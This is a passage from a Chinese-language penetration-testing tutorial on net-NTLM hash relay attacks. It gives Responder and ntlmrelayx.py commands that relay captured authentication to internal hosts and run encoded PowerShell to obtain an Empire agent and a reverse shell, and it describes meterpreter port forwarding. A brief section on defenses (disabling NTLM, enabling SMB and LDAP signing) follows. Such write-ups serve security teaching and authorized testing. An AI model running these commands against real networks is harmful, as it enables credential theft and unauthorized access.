launcher powershell DeathStar,生成powershell代码
文章插图
4、启动Responder
sudo python Responder.py -I eht0 -r -d –v
Deathstar会自动寻找域控制器,及活跃用户等目录进行中继转发 。
5、这条命令是对中继成功的机器,自动执行powershell,获取agent,powershell脚本放在引号中 。
sudo ntlmrelayx.py -t 192.168.191.189 -c ‘powershell -noP -sta -w 1 -enc [powershell code]’
文章插图
ntlmrelayx.py支持-tf(例如target.txt),把目标导入利用中继批量转发攻击 。
6、net use 192.168.191.190a
文章插图
文章插图
可以看到对每台PC进行了转发测试,若成功则反弹shell 。
这个工具感觉没有想象中的强大,前面几分钟都在攻击我的kali攻击机,然后开始对域控进行中继,在整个网段探测存活,再对存活主机进行中继转发.
总结:
【内网渗透-net-NTLM hash的攻击】如果我们的msf在自己内网怎么办,目标内网肯定无法直接转发到我们的Responder,可以通过msf劫持445端口到自己本地,设置一个远程监听端口(auxiliary/scanner/smb/smb_login),用来接收smb的数据,在设置一个meterpreter反向转发端口(portfwdadd) 。
防御:
所有攻击都滥用了 NLTM 身份验证协议,因此唯一完整的解决方案是完全禁用 NTLM 并切换到 Kerberos 。操作系统若不支持 Kerberos 身份验证,无法禁用,启用 SMB 签名,启用 LDAP 签名等来缓解 。
原文链接:https://www.anquanke.com/post/id/200649
推荐阅读
- 内网渗透之域关系探测神器:Bloodhound
- 实战黑客sqlmap渗透攻击mssql数据库最新教程
- 内网穿透神器frp推荐!教你如何一劳永逸的对外暴露内网服务
- 华三防火墙内网用户通过公网地址访问服务器
- 华三防火墙发布内网服务器配置案例
- 内网渗透力杠杠的工具学习之Empire后渗透
- 一次授权渗透实战
- 内网域实战渗透常用命令总结
- 大佬黑客手把手渗透数据库,带小白进入黑客圏
- 两种网络地址段,如何设置内网和外网一起上?